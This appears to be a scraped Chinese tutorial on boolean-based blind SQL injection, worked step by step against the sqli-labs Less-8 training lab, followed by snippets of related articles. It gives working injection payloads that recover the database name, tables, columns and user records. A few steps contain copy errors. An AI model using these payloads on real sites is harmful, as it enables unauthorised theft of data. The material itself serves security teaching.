【SQL注入漏洞-04】布尔盲注靶场实战

article/2025/9/13 16:41:17

布尔盲注

当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注。

布尔盲注原理:

利用页面返回的布尔类型状态,正常或者不正常;

我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例

  • 当我们输入id=1时,页面正常显示

  • 当我们输入id=1'或者id=-1时,页面什么都不显示

这就是基于布尔的盲注,只有两种状态

使用布尔盲注时,如果直接采用猜测的方式的话,时间成本大还很难,为了降低时间成本和难度,我们可以判断数据库名、表名、字段名、字段内容的长度,然后一位一位去测试

注入步骤

判断当前数据类型

MySQL数据库表 information_schema.tables
access msysobjects
SQLServer sysobjects
?id=1' and exists(select*from information_schema.tables) --+
?id=1' and exists(select*from msysobjects) --+
?id=1' and exists(select*from sysobjects) --+

所以当前数据库名为mysql数据库

判断当前数据库名

判断当前数据库名的长度,利用两边夹准则

当我们输入?id=1' and length(database())>10 --+,页面不显示任何数据

然后继续输入?id=1' and length(database())>5--+,页面正常显示

大于5正常显示,大于10不显示说明在5-10之间;

继续输入?id=1' and length(database())>8--+,页面不显示任何数据

而输入?id=1' and length(database())>7--+,页面正常显示

说明大于7但是不大于8,所以我们可以试着继续输入?id=1' and length(database())=8--+

页面正常显示,所以可以知道当前数据库名长度为8个字符

判断当前数据库的字符(先以100为界),也是利用两边夹准则,和判断数据库长度大同小异

判断数据库的字符,我们需要将字符转换为ASCII编码,可以采用大小于号判断数值所对应的ASCII码。

获取数据库名的某一个字符需要用到函数,不同的数据库所用到的函数也不相同

MySQL:substr(str,pos,len), substring(str,pos,len);
Oracle:substr(str,pos,len);
SQL Server:substring(str,pos,len);
其中pos=1时表示的是字符串str的第一个字符
  • 首先我们可以输入?id=1' and ascii (substr(database(),1,1))>100--+,页面正常显示,说明数据库名的第一个字符ASCII码大于100

  • 之后继续输入?id=1' and ascii (substr(database(),1,1))>115--+,页面没有数据,说明第一个字符的ASCII码小于或等于115

  • 最后输入?id=1' and ascii (substr(database(),1,1))=115--+,页面正常显示,说明第一个字符的ASCII码是115,查表可得该字符为s

判断第二个字符

?id=1' and ascii (substr(database(),2,1))=101--+,字符为e

判断第三个字符

?id=1' and ascii(substr(database(),3,1))>100 --+

....................

由此可以判断出当前数据库为 security

判断当前数据库的表名

先判断当前数据库中表的个数,再测试表名的每个字符

判断当前数据库中表的个数

输入?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())>4 --+,页面没有数据,说明小于4张表

利用两边夹准则,获得当前数据库表的个数为4

判断每个表的长度

  • 判断第一个表的长度

输入?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+,利用两边夹准则,最后得出第一个表的长度为6

  • 判断第二个表的长度

输入?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))>6 --+,方法同上,最后得出第二个表的长度为6

  • 判断第三个表的长度

输入?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 2,1))>6 --+,方法同上,最后得出第三个表的长度为7

  • 判断第四个表的长度

输入?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))>6 --+,方法同上,最后得出第四个表的长度为5

判断每个表的每个字符的ASCII值

  • 判断第一个表的第一个字符的ASCII值

输入?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+,方法同上,得到第一个表的第一个字符的ASCII值为101,查表可得该字符为e
  • 判断第一个表的第二个字符的ASCII值

输入?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>100 --+,方法同上,得到第一个表的第一个字符的ASCII值为109,查表可得该字符为m

....................

综上所述,可判断出存在表 emails、referers、uagents、users ,猜测users表中最有可能存在账户和密码,所以以下判断字段和数据在 users 表中判断

判断表的字段

首先判断字段个数,然后再判断每个字段的长度,最后猜测每个字段的字符

判断表中字段的个数

  • 判断users表中字段个数是否大于5

输入?id=1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema='security')>5 --+

最后判断出字段个数为3

判断每个字段的长度

  • 判断第一个字段的长度

输入?id=1' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5 --+

最后判断出第一个字段长度为2

  • 判断第二个字段的长度

输入?id=1' and length((select column_name from information_schema.columns where table_name='users' limit 1,1))>5 --+

最后判断出第二个字段的长度为8

..................

判断每个字段名字的ASCII值

  • 判断第一个字段的第一个字符的ASCII值

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100 --+

最后得到得到第一个字段的第一个字符的ASCII值为105,查表可得该字符为i

  • 判断第一个字段的第二个字符的ASCII值

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>100 --+

最后得到第一个字段的第二个字符的ASCII值为100,查表可得该字符为d

综上所述,可判断出users表中存在 id、username、password 字段

获取字段中的数据

判断字段中数据的长度

  • 判断id字段的第一个数据的长度

?id=1' and length((select id from users limit 0,1))>5 --+

最后得到id字段的第一个数据的长度为1

  • 判断id字段的第二个数据的长度

?id=1' and length((select id from users limit 1,1))>5 --+

最后得到id字段的第二个数据的长度为1

................

判断字段中数据的ASCII值

  • 判断id字段的第一行数据的第一个字符的ascii值

?id=1' and ascii(substr((select id from users limit 0,1),1,1))>100 --+

最后得到id字段的第一行数据的第一个字符的ascii值为49,查表可得该字符为1

.................

总结:

布尔盲注一般不推荐手工注入,时间成本太大,可以借助工具注入。


http://chatgpt.dhexx.cn/article/qNuweutR.shtml

相关文章

SQL注入之盲注简单总结

Mysql盲注总结 什么是盲注? 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。SQL盲注与SQL普通注入的区别?…

sql盲注

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 sql注入--盲注 前言一、什么是盲注二、步骤示例1.测试注入点2.测所在数据库长度3. 利用ASCII码猜当前数据库名 4.利用ASCII码查询表名5、利用ASCII码查询字段名sql手注所用到…

Sql盲注与普通注入的区别

Sql盲注与普通注入的区别 在学习sql注入的时候,好多同学都是不弄清楚原理,去浏览器上狂搜一下注入语句,就开始对老师给的靶机注入,虽然能注入成功,但是不清楚原理,对以后的学习和工作没有多大的好处。现在我…

SQL 注入-盲注

目录 一、什么时候用到盲注? 二、盲注的优缺点 三、盲注的流程 四、盲注的分类 五、布尔盲注 5.1、原理以及什么时候使用布尔盲注? 5.2、例如upload-labs靶场中的Less-8 5.3、布尔盲注常用函数及定义 5.4、length()函数的使用方法 5.5、substr…

Sqlmap使用-盲注小实验

目录 sqlmap简介 基本格式 sqlmap详细命令: Options(选项): Target(目标): Request(请求): Enumeration(枚举): O…

SQL注入原理-布尔盲注

小伙伴们大家好,今天为大家带来的使SQL注入原理之布尔盲注。 目录 布尔盲注使用的环境 常用函数与语句 substr()函数 ord()函数 length()函数 实战演示 1、判断是否存在注入点 2、尝试用报错盲注看是否能够成功爆出数据 3、使用布尔盲注来爆出数据信息…

DVWA之sql注入——盲注

1.盲注 1.1 布尔盲注 布尔很明显的Ture跟Fales,也就说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错 信息。 1.判断是否存在注入,注入的类型 不管输入框输入为何内容,页面上只会返回以下2种情形的提示&#xff…

SQL注入2——盲注(重学)

SQL注入——盲注 SQL注入——盲注 SQL注入——盲注一、布尔型盲注1、判断2、盲注库名3、盲注表名4、盲注列名5、盲注数据 时间型盲注总结 一、布尔型盲注 假如网站一定存在SQL注入,当注入SQL语句(1’ and 12#)之后,网站页面缺没有…

注入利用——盲注

盲注基本概念: 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。 基于布尔的盲注 Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库 中的相关信息。 …

SQL注入-布尔盲注

页面没有显示位 , 没有报错信息 , 只有成功和不成功两种情况时 , 可以使用布尔盲注 本次以 SQLi LABS 第9关为案例进行讲解 布尔盲注常用的两个函数(我觉得) length(abc) -- 判断字符串长度 substr(abc,1,1) -- 截取字符串,从第1个字符开始截取,截取1个 第一步,判断注入类型…

SQL注入原理-时间盲注

小伙伴们大家好!本期为大家带来的是SQL注入原理之时间盲注。 目录 使用环境 常见函数与语句 sleep()函数 if语句 substr()函数 ord()函数 length()函数 实战演示 1、判断是否存在注入点 2、使用时间盲注爆出数据 1、爆出当前数据库名的长度 2、爆出数…

sql注入之盲注相关知识

盲注 一.概念理解: 盲注(Blind SQL Injection ),就是在 sql 注入过程中, sql 语句执行之后, 数据不能回显到前端页面,需要利用一些方法进行判断或者尝试。 二.盲注基本条件: 自己可以控制输入 原程序要执行的代码拼接了用户输入的数据。 …

盲注--理论知识

盲注的简单定义: 我们在查询过程中,页面只有两种情况:“true”和“false”,要么有,要么没有;查询表的记录和语句错误也不会显示。这种状况下的注入,称为盲注。 盲注的关键点: 根据…

布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程

「作者主页」:士别三日wyx 「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「专栏简介」:此文章已录入专栏《网络安全快速入门》 布尔盲注 一、适用环境二、盲注步骤三、原理分析1. 长度判断原理2. 穷举字…

SQL盲注(原理概述、分类)

盲注原理 盲注的分类 盲注常用函数 一、SQL盲注概述 盲注:即在SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或尝试,这个过程成为盲注 1.如果数据库运行返回结…

盲注

目录 1、注入攻击的本质 2、盲注的介绍 (一)布尔盲注 (二)时间盲注 3、盲注常用方法 (一)length()函数 (二)substr()截取字符串…

SQL注入-盲注(布尔盲注与时间盲注)

目录 一、什么是盲注 二、盲注的分类 三、利用盲注的前提条件 四、盲注的优缺点 五、基于布尔类型的盲注 1.什么情况下使用布尔类型的盲注 2.使用布尔类型盲注的操作步骤: 3.布尔类型盲注的操作过程(以获取当前数据库为例) 4.使用其他…

详述ROWID的原理及其使用

ROWID基础概念 在Oracle内部,每个数据表都有一个伪列ROWID,用于存放被称为ROWID的二进制值。每个ROWID代表了一行数据的存储地址。物理ROWID能够标识普通数据表中的一行信息。其中ROWID类型只能存储物理内容,而UROWID(universal rowid)类型可…

Oracle中ROWNUM伪列和ROWID伪列的用法与区别

做过Oracle分页的人都知道由于Oracle中没有像MySql中limit函数以及SQLServer中的top关键字等,所以只能通过伪列的方式去满足分页功能,在此,不谈分页方法,只从根本上去介绍这两个伪列的用法与原理,同样还是以scott用户的…

Silverlight MMORPG WebGame游戏设计(二)--通讯协议之惑

晚上看到我在silverlight webGame上的导师"深蓝色右手"拿到 荣誉,觉得他名至实归。回想自己2010过年来到北京忙于一些琐屑的事情,好久没有动手写我的web传奇了。 去年在群里说我过年要开源我的Web传奇,写一些服务端的文章。后来我发…